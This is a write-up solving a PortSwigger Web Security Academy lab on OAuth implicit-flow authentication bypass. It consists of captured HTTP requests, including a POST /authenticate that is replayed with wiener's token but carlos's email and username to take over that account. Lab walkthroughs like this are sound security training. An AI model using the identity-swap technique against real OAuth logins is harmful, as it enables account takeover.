Skip to content

Port Swigger Authentication bypass via OAuth impli

Authentication bypass via OAuth implicit flow

Solution

Open website: https://0a0a0065046c44028053036200da0031.web-security-academy.net/social-login

Login via SM oAuth
https://0a0a0065046c44028053036200da0031.web-security-academy.net/social-login
---
GET /social-login HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=vg5I71pdWcxGe0GFNZfvvigXOsiRUo0X
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0a0065046c44028053036200da0031.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /oauth-callback HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=vg5I71pdWcxGe0GFNZfvvigXOsiRUo0X
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Priority: u=0, i
Te: trailers

Get token for user: wiener

POST /authenticate HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=vg5I71pdWcxGe0GFNZfvvigXOsiRUo0X
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0a0065046c44028053036200da0031.web-security-academy.net/oauth-callback
Content-Type: application/json
Content-Length: 103
Origin: https://0a0a0065046c44028053036200da0031.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

{"email":"[email protected]","username":"wiener","token":"Xf0VEC_szzfpq7Djmph1q7mXyfdp2ci6-yfccOSmIzt"}

Get user account details

GET /my-account?id=wiener HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=uVgW9UKss3CekuERNx48lOErcJPWcYVc
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0a0065046c44028053036200da0031.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Replace email and username

Replace email and username
{"email":"[email protected]","username":"wiener","token":"Xf0VEC_szzfpq7Djmph1q7mXyfdp2ci6-yfccOSmIzt"}
{"email":"[email protected]","username":"carlos","token":"Xf0VEC_szzfpq7Djmph1q7mXyfdp2ci6-yfccOSmIzt"}
---
POST /authenticate HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=vg5I71pdWcxGe0GFNZfvvigXOsiRUo0X
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0a0065046c44028053036200da0031.web-security-academy.net/oauth-callback
Content-Type: application/json
Content-Length: 103
Origin: https://0a0a0065046c44028053036200da0031.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

{"email":"[email protected]","username":"carlos","token":"Xf0VEC_szzfpq7Djmph1q7mXyfdp2ci6-yfccOSmIzt"}

Login as user carlos

GET /my-account?id=carlos HTTP/2
Host: 0a0a0065046c44028053036200da0031.web-security-academy.net
Cookie: session=cL2wiuAPoBl9p8xG4A1FZxqogUGbSBdt
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0a0065046c44028053036200da0031.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Solved